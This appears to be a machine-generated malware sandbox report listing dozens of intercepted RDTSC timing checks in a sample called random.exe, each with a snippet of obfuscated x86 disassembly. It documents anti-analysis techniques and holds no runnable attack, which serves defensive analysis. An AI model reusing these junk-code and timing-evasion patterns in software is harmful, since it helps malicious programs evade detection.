Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107700D second address: 1077027 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FDD093B1DF3h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C30D second address: 107C324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 push edi 0x00000008 pushad 0x00000009 popad 0x0000000a pop edi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f jnp 00007FDD08CD5746h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C324 second address: 107C32E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C32E second address: 107C333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C333 second address: 107C33B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 107C33B second address: 107C33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080009 second address: 108001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007FDD093B1DECh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108001C second address: 1080031 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FDD08CD5746h 0x00000009 jmp 00007FDD08CD574Ah 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1080031 second address: 108003C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10804BB second address: 10804BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10804BF second address: 10804C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10804C3 second address: 10804CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10804CE second address: 10804E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DEBh 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c push ecx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10809D7 second address: 10809DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1082CCB second address: 1082CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1082CCF second address: 1082CF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FDD08CD5759h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1082CF1 second address: 1082D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007FDD093B1DE6h 0x0000000c popad 0x0000000d jmp 00007FDD093B1DF3h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pushad 0x00000017 popad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a pop edi 0x0000001b push eax 0x0000001c push edx 0x0000001d js 00007FDD093B1DE6h 0x00000023 pushad 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1082D24 second address: 1082D3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5754h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1082D3C second address: 1082D4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD093B1DEEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1086441 second address: 108645D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5752h 0x00000009 jng 00007FDD08CD5746h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1086170 second address: 1086199 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DECh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDD093B1DF4h 0x0000000e pop ecx 0x0000000f push ecx 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1088690 second address: 1088696 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1088696 second address: 108869C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108869C second address: 10886A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FDD08CD5746h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10886A8 second address: 10886AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10886AC second address: 10886BC instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD08CD5746h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 108AA65 second address: 108AA6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109601B second address: 1096028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1096028 second address: 109602E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109602E second address: 1096075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD08CD5750h 0x00000009 popad 0x0000000a jnp 00007FDD08CD574Eh 0x00000010 push eax 0x00000011 pop eax 0x00000012 jng 00007FDD08CD5746h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FDD08CD5750h 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 jg 00007FDD08CD5746h 0x00000029 jg 00007FDD08CD5746h 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1096075 second address: 109607A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 109607A second address: 1096088 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edi 0x00000004 pop edi 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1096088 second address: 109608C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A4634 second address: 10A4638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A4638 second address: 10A463C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A7041 second address: 10A7050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 js 00007FDD08CD574Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A96F2 second address: 10A96F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A96F8 second address: 10A96FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A96FE second address: 10A9703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9703 second address: 10A9708 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9708 second address: 10A9711 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9711 second address: 10A9717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9717 second address: 10A973C instructions: 0x00000000 rdtsc 0x00000002 jc 00007FDD093B1DE6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007FDD093B1DF7h 0x00000014 jne 00007FDD093B1DE6h 0x0000001a jmp 00007FDD093B1DEBh 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A973C second address: 10A9742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9742 second address: 10A9748 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10A9748 second address: 10A9776 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDD08CD5746h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007FDD08CD5746h 0x00000013 jmp 00007FDD08CD5757h 0x00000018 pushad 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BCB98 second address: 10BCBA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDD093B1DE6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BCBA6 second address: 10BCBB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007FDD08CD5746h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BCBB3 second address: 10BCBD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF9h 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BCEBA second address: 10BCEC6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BCEC6 second address: 10BCEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDD093B1DF0h 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BD498 second address: 10BD49E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BD658 second address: 10BD65F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10BF369 second address: 10BF36D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C1D69 second address: 10C1D6F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C1D6F second address: 10C1D8C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDD08CD5759h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C1F87 second address: 10C1FD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dx, FDA4h 0x0000000d mov edx, 084D0F2Ah 0x00000012 push 00000004h 0x00000014 mov edx, 04E043E8h 0x00000019 call 00007FDD093B1DE9h 0x0000001e jno 00007FDD093B1DEEh 0x00000024 push eax 0x00000025 jmp 00007FDD093B1DEAh 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e push esi 0x0000002f push eax 0x00000030 js 00007FDD093B1DE6h 0x00000036 pop eax 0x00000037 pop esi 0x00000038 mov eax, dword ptr [eax] 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push esi 0x0000003e pop esi 0x0000003f pop eax 0x00000040 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C1FD8 second address: 10C2028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDD08CD5759h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007FDD08CD5750h 0x00000019 jmp 00007FDD08CD5757h 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C2277 second address: 10C22B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007FDD093B1DECh 0x00000011 pop edi 0x00000012 nop 0x00000013 clc 0x00000014 push dword ptr [ebp+122D27A5h] 0x0000001a or edx, 0AC09652h 0x00000020 push 1E52F0CBh 0x00000025 pushad 0x00000026 pushad 0x00000027 jc 00007FDD093B1DE6h 0x0000002d pushad 0x0000002e popad 0x0000002f popad 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C22B2 second address: 10C22B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C3988 second address: 10C398E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C5487 second address: 10C549D instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDD08CD5746h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d push ebx 0x0000000e js 00007FDD08CD574Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 10C549D second address: 10C54AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDD093B1DEEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE534 second address: FDE538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: FDE538 second address: FDE560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FDD093B1DEFh 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushad 0x00000013 popad 0x00000014 pop ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70960 second address: 4F709EC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5751h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FDD08CD574Eh 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 4A1B1874h 0x00000016 pushfd 0x00000017 jmp 00007FDD08CD574Dh 0x0000001c add si, 2E36h 0x00000021 jmp 00007FDD08CD5751h 0x00000026 popfd 0x00000027 popad 0x00000028 xchg eax, ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007FDD08CD5753h 0x00000032 sbb esi, 0CFA6B6Eh 0x00000038 jmp 00007FDD08CD5759h 0x0000003d popfd 0x0000003e mov ah, 8Ch 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F709EC second address: 4F70A8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop ebx 0x00000005 mov cl, 10h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FDD093B1DEDh 0x00000013 xor eax, 71653256h 0x00000019 jmp 00007FDD093B1DF1h 0x0000001e popfd 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FDD093B1DEEh 0x00000026 xor si, BC78h 0x0000002b jmp 00007FDD093B1DEBh 0x00000030 popfd 0x00000031 pushad 0x00000032 popad 0x00000033 popad 0x00000034 popad 0x00000035 xchg eax, ecx 0x00000036 pushad 0x00000037 mov bl, ah 0x00000039 mov cl, bh 0x0000003b popad 0x0000003c push eax 0x0000003d jmp 00007FDD093B1DF9h 0x00000042 xchg eax, ecx 0x00000043 jmp 00007FDD093B1DEEh 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b jmp 00007FDD093B1DF7h 0x00000050 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70A8E second address: 4F70A94 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70A94 second address: 4F70ADB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FDD093B1DEEh 0x0000000e xchg eax, esi 0x0000000f jmp 00007FDD093B1DF0h 0x00000014 lea eax, dword ptr [ebp-04h] 0x00000017 pushad 0x00000018 push eax 0x00000019 call 00007FDD093B1DEDh 0x0000001e pop eax 0x0000001f pop edi 0x00000020 mov dx, ax 0x00000023 popad 0x00000024 nop 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70ADB second address: 4F70ADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70ADF second address: 4F70AE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70AE5 second address: 4F70AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70AEB second address: 4F70B0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movsx ebx, si 0x0000000d mov ax, 08A3h 0x00000011 popad 0x00000012 nop 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov bx, CBF6h 0x0000001a mov ebx, 0BE5B182h 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70B0B second address: 4F70B11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70B11 second address: 4F70B15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F70C57 second address: 4F601D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d sub esp, 04h 0x00000010 xor ebx, ebx 0x00000012 cmp eax, 00000000h 0x00000015 je 00007FDD08CD5892h 0x0000001b mov dword ptr [esp], 0000000Dh 0x00000022 call 00007FDD0CE29752h 0x00000027 mov edi, edi 0x00000029 jmp 00007FDD08CD5750h 0x0000002e xchg eax, ebp 0x0000002f pushad 0x00000030 mov dx, A670h 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007FDD08CD5755h 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F601D2 second address: 4F601D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F601D8 second address: 4F601DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F601DC second address: 4F60215 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, A156h 0x00000013 jmp 00007FDD093B1DF7h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60215 second address: 4F60243 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD5759h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FDD08CD574Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60243 second address: 4F60297 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD093B1DF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c jmp 00007FDD093B1DEEh 0x00000011 xchg eax, ebx 0x00000012 jmp 00007FDD093B1DF0h 0x00000017 push eax 0x00000018 pushad 0x00000019 mov ebx, 27937380h 0x0000001e popad 0x0000001f xchg eax, ebx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FDD093B1DF2h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F60297 second address: 4F602AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDD08CD574Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F602AD second address: 4F602B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F602B1 second address: 4F602B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4F602B5 second address: 4F602BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
